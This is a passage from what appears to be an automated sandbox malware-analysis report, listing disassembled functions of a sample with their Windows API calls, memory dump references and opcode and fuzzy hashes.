    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0004B1B7,?,?,000481FD), ref: 0004A976
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 4578682801949b6d4d96eb76d906774152199d035e9a50d31896a41d09665ac9
    • Instruction ID: 6a6f879303c0903dca797e36a16fca3b033988d03bd5c028a8a8213bf121b55a
    • Opcode Fuzzy Hash: 4578682801949b6d4d96eb76d906774152199d035e9a50d31896a41d09665ac9
    • Instruction Fuzzy Hash: 2D21D0B1644344AEE3B08A65CC88FF776DCEB4A321F010A2DF9D5C21D2C778AC858672
    Function 00064CF2 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • FreeLibrary.KERNEL32(00000000,?,000A40C4,?,?,?,00064EE6,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx,00000000,?,00064C9D,000A40C4,00000FA0), ref: 00064D75
    • GetProcAddress.KERNEL32(00000000,?), ref: 00064D7F
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AddressFreeLibraryProc
    • String ID:
    • API String ID: 3013587201-0
    • Opcode ID: bd17c5732fe983631bfe7181ed23e3c61f604fc551f5bd5ad4a0649365f99655
    • Instruction ID: d9456b46798db08ec7a827485b7c3e23ea23d2e8455c48a7fa11d9446b48726a
    • Opcode Fuzzy Hash: bd17c5732fe983631bfe7181ed23e3c61f604fc551f5bd5ad4a0649365f99655
    • Instruction Fuzzy Hash: 34118E35A00515EF9F22CFA4E8809AA73E6FB86750B250269EA05E7250E730DD41CB90
    Function 0004B110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
    Download Yara Rule
    APIs
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 0004B157
    • GetLastError.KERNEL32 ref: 0004B164
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 0523078c299fab0ceaeb2ece1a3dd177ebdd85b2a5ccb0e9ad46176f2bd97628
    • Instruction ID: 1acb60d4fdfbf2055dbf19dbe37630f7697317f4925bf3dd20a120f4e7be8288
    • Opcode Fuzzy Hash: 0523078c299fab0ceaeb2ece1a3dd177ebdd85b2a5ccb0e9ad46176f2bd97628
    • Instruction Fuzzy Hash: 901108B1640700EBE7359624CC64BAAB3E9BB44370FA04B3DE552931E0D774ED45C754
    Function 0006A694 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 0006A6B5
      • Part of subcall function 0006A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,000830C4,0004187A,?,?,00000007,?,?,?,000413F2,?,00000000), ref: 0006A6F1
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Heap$AllocAllocate_free
    • String ID:
    • API String ID: 2447670028-0
    • Opcode ID: 10ee793a6e68fe63d234b790d713317f0cbd9ebbd6f8323a94071ba7e8923f15
    • Instruction ID: 066719c12209d8d4166b7d53aadaac6e776cab33d2f33a5651b32db753c352c2
    • Opcode Fuzzy Hash: 10ee793a6e68fe63d234b790d713317f0cbd9ebbd6f8323a94071ba7e8923f15
    • Instruction Fuzzy Hash: 85F0C231304114A6DB213A26EC00AAF279B9FC37B0B194115F81AB60A2DB309C009D67
    Function 000523B6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(?,?), ref: 000523C3
    • GetProcessAffinityMask.KERNEL32(00000000), ref: 000523CA
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Process$AffinityCurrentMask
    • String ID:
    • API String ID: 1231390398-0
    • Opcode ID: 4b9281331909d90407c0457becb89eb3320febc85ddf31955bc6a4ec81fad327
    • Instruction ID: 31fb859831ec6c66b71ab3a59cf7625d77662c0a021b629d991c81a54486a6f7
    • Opcode Fuzzy Hash: 4b9281331909d90407c0457becb89eb3320febc85ddf31955bc6a4ec81fad327
    • Instruction Fuzzy Hash: 05E09232F00105A7DF0987A49C459EB76DCEF552463248175A903E3100EA7CDE4946A0
    Function 0004B8E6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
    Download Yara Rule
    APIs
    • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B8FA
      • Part of subcall function 0004CF32: _wcslen.LIBCMT ref: 0004CF56
    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B92B
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: e3f1084ca5132c5e1e32ad41c551aa558adec2c2afb10362fc9c39f328725dc5
    • Instruction ID: 6648eaf44f34b47f796ca93e93d75a8dc07be67fa97f0813db90c26011be18ee
    • Opcode Fuzzy Hash: e3f1084ca5132c5e1e32ad41c551aa558adec2c2afb10362fc9c39f328725dc5
    • Instruction Fuzzy Hash: 07F0853150420ABBEB115FA08C00BEA37ACAB083C5F008061BA48E6161DB39DDA89A60
    Function 0004B470 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
    Download Yara Rule
    APIs
    • DeleteFileW.KERNEL32(?,00000000,?,0004A438,?,?,?,?,0004892B,?,?,?,000737FF,000000FF), ref: 0004B481
      • Part of subcall function 0004CF32: _wcslen.LIBCMT ref: 0004CF56
    • DeleteFileW.KERNEL32(?,?,?,00000800,?,0004A438,?,?,?,?,0004892B,?,?,?,000737FF,000000FF), ref: 0004B4AF
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: DeleteFile$_wcslen
    • String ID:
    • API String ID: 2643169976-0
    • Opcode ID: c212d09911d7032b8a373da6c0f0d00d3e24ea6eabe86c4f3430e9eb7274e223
    • Instruction ID: 7bc85e0925ac653795212d5af79ccd1e071d52b0df919ef416255dd0665f7609
    • Opcode Fuzzy Hash: c212d09911d7032b8a373da6c0f0d00d3e24ea6eabe86c4f3430e9eb7274e223
    • Instruction Fuzzy Hash: 5CE092725442196BEB015B60CC45FEA379DBF04382F444031BE49D20A2DB78EDC99A54
    Function 0005BD71 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
    Download Yara Rule
    APIs
    • GdiplusShutdown.GDIPLUS(?,?,?,?,000737FF,000000FF), ref: 0005BDA5
    • CoUninitialize.COMBASE(?,?,?,?,000737FF,000000FF), ref: 0005BDAA
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: GdiplusShutdownUninitialize
    • String ID:
    • API String ID: 3856339756-0
    • Opcode ID: f234384bd0d6693863bff543fbbd0a95c9462639d23c259ae1eddfca6a86260c
    • Instruction ID: 4ab5ee4639fe57e3b7b4594dd8c3a12c18b7c44fd78674ae1561100f3e602ec3
    • Opcode Fuzzy Hash: f234384bd0d6693863bff543fbbd0a95c9462639d23c259ae1eddfca6a86260c
    • Instruction Fuzzy Hash: 92E06572604951EFD7119B48DC05B59FBA9FB89B20F004226B41593761CB7C6801CA90
    Function 0004B4D3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
    Download Yara Rule
    APIs
    • GetFileAttributesW.KERNEL32(?,?,?,0004B4CA,?,00048042,?), ref: 0004B4E4
      • Part of subcall function 0004CF32: _wcslen.LIBCMT ref: 0004CF56
    • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,?,0004B4CA,?,00048042,?), ref: 0004B510
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: fc431af5e10faebbccb4da55e177db8332d94ef5c4330eab6bac50575deac4e8
    • Instruction ID: c3d9f81000bc5b493a88c31fd73129e8526c5eb6d0d75edc7cc88d931689231d
    • Opcode Fuzzy Hash: fc431af5e10faebbccb4da55e177db8332d94ef5c4330eab6bac50575deac4e8
    • Instruction Fuzzy Hash: 4AE0D8719002286BDB60AB68DC04BD9779CBB093E2F010170FE49E3191D778DD848BD4
    Function 0005EFF2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 0005F01C
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • SetDlgItemTextW.USER32(00000065,?), ref: 0005F033
      • Part of subcall function 0005C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C759
      • Part of subcall function 0005C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0005C76A
      • Part of subcall function 0005C748: IsDialogMessageW.USER32(00010468,?), ref: 0005C77E
      • Part of subcall function 0005C748: TranslateMessage.USER32(?), ref: 0005C78C
      • Part of subcall function 0005C748: DispatchMessageW.USER32(?), ref: 0005C796
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekTextTranslateUser__vswprintf_c_l_swprintf
    • String ID:
    • API String ID: 3954729096-0
    • Opcode ID: c7a26f5495b75925de3ea7efa4054f8bd439aa6d5103ac818966f4735e893f64
    • Instruction ID: 92dde84ea04e899555ff8b19effd682d5e72dae26d52095a7cdb50c721adbd36
    • Opcode Fuzzy Hash: c7a26f5495b75925de3ea7efa4054f8bd439aa6d5103ac818966f4735e893f64
    • Instruction Fuzzy Hash: DBE09B7551424C36FF016765DC0AFEB365C7B0538AF040462B641D64A3D67899158B66
    Function 00051B34 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
    Download Yara Rule
    APIs
    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B4F
    • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00050633,Crypt32.dll,00000000,000506AD,00000200,?,00050690,00000000,00000000,?), ref: 00051B71
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: DirectoryLibraryLoadSystem
    • String ID:
    • API String ID: 1175261203-0
    • Opcode ID: 75482fd34c958742159fff0b386dfac3e408c0846f5aa2d7020666718152a0c5
    • Instruction ID: 5c275e7f1c52f985985b4ca5c22a384116f565a8bdd0430ee141785c05a27b51
    • Opcode Fuzzy Hash: 75482fd34c958742159fff0b386dfac3e408c0846f5aa2d7020666718152a0c5
    • Instruction Fuzzy Hash: 51E048769002286AEB11A7A4DC08FDB77ACEF093C2F044075BA49E2045DB78DA84CBF0
    Function 0005B3B8 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
    Download Yara Rule
    APIs
    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005B3D9
    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0005B3E0
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: BitmapCreateFromGdipStream
    • String ID:
    • API String ID: 1918208029-0
    • Opcode ID: 61b2769bbea457aa5e7d94d6b7a3bce3827b9ce9d434fd787fac3d78efcd5629
    • Instruction ID: a6bb8ec2f7ff64f194d10c78801196762bad22b35cf9666648446bf356e3e3b5
    • Opcode Fuzzy Hash: 61b2769bbea457aa5e7d94d6b7a3bce3827b9ce9d434fd787fac3d78efcd5629
    • Instruction Fuzzy Hash: D7E0ED71905618EBDB54DF59C9417DEB7F8EB04352F20806AE855A3601D3B8AF089B61
    Function 00063D0C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
    Download Yara Rule
    APIs
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00063D2A
    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00063D35
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Value___vcrt____vcrt_uninitialize_ptd
    • String ID:
    • API String ID: 1660781231-0
    • Opcode ID: e2ffb7dc79709d7acfd63dffc447b2e6df3e80405892eb485ae69dd1192e75fb
    • Instruction ID: 11d5956c0f5fa996c6fa4dcee7ec5353d78ee3aa77bdc7658edaaa4a0f129faa
    • Opcode Fuzzy Hash: e2ffb7dc79709d7acfd63dffc447b2e6df3e80405892eb485ae69dd1192e75fb
    • Instruction Fuzzy Hash: 31D02235C08B1408EC6426B438024DB13CBAF137B5BA02746F630CA0C3EE2187043693
    Function 000412D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ItemShowWindow
    • String ID:
    • API String ID: 3351165006-0
    • Opcode ID: a4675c79ac4f0faf112bf6b971a5b3f2c047ec3c79647b4a716c1007ae5a79a2
    • Instruction ID: 93e822fa390e942f4afb379a74d0e5d00cc934c31994f0c431e0bf511888371c
    • Opcode Fuzzy Hash: a4675c79ac4f0faf112bf6b971a5b3f2c047ec3c79647b4a716c1007ae5a79a2
    • Instruction Fuzzy Hash: 6DC01232158A00BEDB010BB0DC09E3ABBA8BBAA212F10CA08F0A6C1060C23DC010DB11
    Function 00041AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: cd43d2c586453fcd24ad483ede0afcc3f73e7029094c987fef33f38353fcadbb
    • Instruction ID: 070881fae0d5b0a8c088f2f365f8447a4fcec6d602ff9be33973ab0ee9ba98b2
    • Opcode Fuzzy Hash: cd43d2c586453fcd24ad483ede0afcc3f73e7029094c987fef33f38353fcadbb
    • Instruction Fuzzy Hash: 18C191B4A402549BDF65CF28C8C47ED7BE5AF4A310F1801B9EC059B297CB349AC5CB69
    Function 000490A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000490A7
      • Part of subcall function 000413F8: __EH_prolog.LIBCMT ref: 000413FD
      • Part of subcall function 00042032: __EH_prolog.LIBCMT ref: 00042037
      • Part of subcall function 0004B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0004B991
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog$CloseFind
    • String ID:
    • API String ID: 2506663941-0
    • Opcode ID: 274db8acdf95fc0785b7e180772750dc20824054b6e2a5836f2d72b718f2b1ff
    • Instruction ID: 16151edd22795081a72d8cd720da804b9de8fa674f27a05312e1e06060cd7c02
